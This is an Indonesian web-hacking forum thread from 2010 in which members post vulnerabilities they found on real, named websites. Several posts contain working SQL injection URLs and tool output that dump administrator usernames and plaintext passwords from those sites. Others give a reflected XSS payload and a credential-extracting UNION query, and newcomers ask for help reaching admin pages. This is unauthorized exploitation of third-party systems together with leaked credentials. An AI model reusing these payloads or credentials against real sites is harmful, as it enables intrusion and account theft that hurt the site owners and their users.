bug site post di sini

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
nesta
Posts: 555
Joined: Fri May 08, 2009 12:17 am
Contact:

Re: bug site post di sini

Post by nesta » Wed Feb 10, 2010 1:16 am

imajinasi jauh lebih penting dari pada pengetahuan

adit_coolz
Posts: 13
Joined: Sun Aug 26, 2007 6:59 pm
Location: pAradIse

Re: bug site post di sini

Post by adit_coolz » Wed Feb 10, 2010 2:17 am

Code: Select all

[+] URL:http://www.surfingqueensland.com.au/news.php?id=74+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
[+] Evasion Used: "+" "--"
[+] 02:13:43
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: surf42ql_sq
	User: surf42ql_inam@localhost
	Version: 5.0.89-community
[+] Dumping data from database "surf42ql_sq" Table "admin"
[+] Column(s) ['admin_id', 'admin_name', 'admin_pwd', 'admin_email']
[+] Number of Rows: 2

[0] 1:sqwebadmin:check49mate:[email protected]:
[1] 2:schooladmin:gongmi79:[email protected]:[email protected]:
scidies lagi belajar mohon maap kalo banyak salah :kaca:

adit_coolz
Posts: 13
Joined: Sun Aug 26, 2007 6:59 pm
Location: pAradIse

Re: bug site post di sini

Post by adit_coolz » Wed Feb 10, 2010 2:38 am

Code: Select all

[+] URL:http://www.duralee.com/trim/sku_treasure.php?Book_id=3+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 02:37:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: duralee_search
	User: [email protected]
	Version: 5.0.82-msl-usrs-sure2-log
[+] Dumping data from database "duralee_search" Table "Administrators"
[+] Column(s) ['user_id', 'username', 'user_password']
[+] Number of Rows: 3

[0] 60:ted:phpwork:
[1] 61:mark:phpwork:
[2] 62:duralee:duralee:duralee:
:devil

turfa
Posts: 59
Joined: Sun Jan 10, 2010 11:16 am

Re: bug site post di sini

Post by turfa » Wed Feb 24, 2010 4:16 am

Plus admin page-nya dong

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: bug site post di sini

Post by peniru » Fri Feb 26, 2010 4:22 pm

Image
ni ada bug xss.. gk tau mau d apain... bingung... :mati: :mati:

Code: Select all

http://www.ivao.web.id/news.php?id=12&mid=%3Cscript%20language=%22javascript%22%3Ealert(%27halo%27)%3C/script%3E
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

User avatar
dark_superman
Posts: 13
Joined: Mon Nov 17, 2008 3:44 pm
Contact:

Re: bug site post di sini

Post by dark_superman » Fri Feb 26, 2010 8:29 pm

yang diatas bugsnya yang mana nieh!!!! :circle:

kok halo doang?? masih bingung!!! :putusasa:

untouch
Posts: 19
Joined: Fri Feb 26, 2010 11:36 am

Re: bug site post di sini

Post by untouch » Fri Feb 26, 2010 9:57 pm

dark_superman wrote:yang diatas bugsnya yang mana nieh!!!! :circle:

kok halo doang?? masih bingung!!! :putusasa:
ha ha hay..
lucu jua postinganya u .. :omg:

metode penyerangan thd web app , gk hanya lwt sql aja omz..

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: bug site post di sini

Post by peniru » Sat Feb 27, 2010 11:28 pm

dark_superman wrote:yang diatas bugsnya yang mana nieh!!!! :circle:

kok halo doang?? masih bingung!!! :putusasa:
http://www.ivao.web.id/news.php?id=12&m ... /script%3E

bugnya :
%3Cscript%20language=%22javascript%22%3Ealert(%27halo%27)%3C/script%3E
ato/
<script language="javascript">alert('isi dengan kata yang kamu mau')</script>
-----------------------------------------------------------------------------------------------------
idealnya seharusnya bukan kata 'halo' yang harus muncul. harusnya peringatan ato semacamnyalah... berhubung q masi lum ngerti nginject pake xss, jd q cuman bisa ksi liat tu ajah...
hal itu disebabkan tidak ada proses filter dari masukan variabel yang baik...

kalo gk salah yag,, cus masi cupu :circle: :circle:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

Zinthink
Posts: 6
Joined: Wed Aug 06, 2008 8:40 pm

Re: bug site post di sini

Post by Zinthink » Mon Mar 01, 2010 11:40 am

blackxnovo wrote:

Code: Select all

http://www.ambonekspres.com/index.php?act=rubrik&catid=-9+UNION+ALL+SELECT+1,2,concat_ws(0x3a,User,Password),4,5,6,7,8+from+user--


dah lengkap semua cuma ngga tau halaman admin buat login di mana yaa hehehhe tolonGGGGgg

culun2000
Posts: 1
Joined: Tue Mar 02, 2010 7:26 am

Re: bug site post di sini

Post by culun2000 » Tue Mar 02, 2010 7:32 am

Permisi om-om yg ganteng, saya mau nanya nih maklum newbie, ini menandakan bug pada suatu website ya? http://www.milim.com/news.php?id=100%27
jika benar, trus ngelanjutin buat dapatin pass adminnya gimana OM
Tolong OM ajarin SQL injection dong OM, Maklum Om anak baru.... :pusing: :pusing: :pusing:

Post Reply

Return to “Web Hacking”